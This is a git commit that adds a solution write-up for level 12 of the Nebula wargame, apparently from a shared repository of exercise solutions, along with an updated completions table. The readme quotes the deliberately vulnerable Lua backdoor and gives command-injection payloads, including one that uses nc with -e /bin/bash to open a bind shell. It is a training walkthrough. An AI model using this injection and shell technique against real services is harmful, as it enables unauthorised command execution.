Commit 4be24ea

Richard Luby <richluby@gmail.com>
2016-10-12 08:57:29
added solution for level 12
level twelve has a command injection vulnerability for unsanitized user input passed to a system call
master
1 parent dd9d69e
Changed files (2)
exploit_exercises
nebula
level12
readme.md
completions.md
exploit_exercises/nebula/level12/readme.md
@@ -1,11 +1,14 @@
 
-----------------------------------------------
+# Nebula - Level12 - Backdoor Program
+
+## About
 
-About
-Source code
 There is a backdoor process listening on port 50001.
-To do this level, log in as the level12 account with the password
-level12. Files for this level can be found in /home/flag12.
+To do this level, log in as the `level12` account with the password
+`level12`. Files for this level can be found in `/home/flag12`.
+
+## Source code
+```
 local socket = require("socket")
 local server = assert(socket.bind("127.0.0.1", 50001))
 
@@ -39,3 +42,20 @@ while 1 do
 
   client:close()
 end
+```
+
+## Solution
+
+Note the line `prog = io.popen("echo "..password.." | sha1sum", "r")`. `password` is supplied by the
+user without any form of sanitization. This allows the attacker to enter
+`echo "4754a4f4bd5787accd33de887b9250a0691dd198#" | nc 127.0.0.1 50001` as the password, which
+comments the rest of the line and simply returns the hash. But what if we do not have the hash?
+
+The lack of sanitization allows any arbitrary command sequence to be entered. Ergo, we can establish
+a binding `nc` shell. To do this, use
+
+```
+echo '""; nc.traditional -lkp 5002 -e /bin/bash; #' | nc 127.0.0.1 50001
+```
+
+Connect to the shell with `nc 127.0.0.1 5002`.
exploit_exercises/nebula/completions.md
@@ -3,4 +3,4 @@
 Handle               |Level00 |Level01 |Level02 |Level03 |Level04 |Level05 |Level06 |Level07 |Level08 |Level09 |Level10 |Level11 |Level12 |Level13 |Level14 |Level15 |Level16 |Level17 |Level18 |Level19
 ---------------------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|-------
 **bryfry**           | [x]    |        | [x]    |        | [x]    |        | [x]    |        |        |        |        |        |        |        |        |        |        |        |        |        
-**richluby**         |        | [x]    |        | [x]    |        | [x]    |        | [x]    |        | [x]    | [x]    | [x]    |        |        |        |        |        |        |        |        
+**richluby**         |        | [x]    |        | [x]    |        | [x]    |        | [x]    |        | [x]    | [x]    | [x]    | [x]    |        |        |        |        |        |        |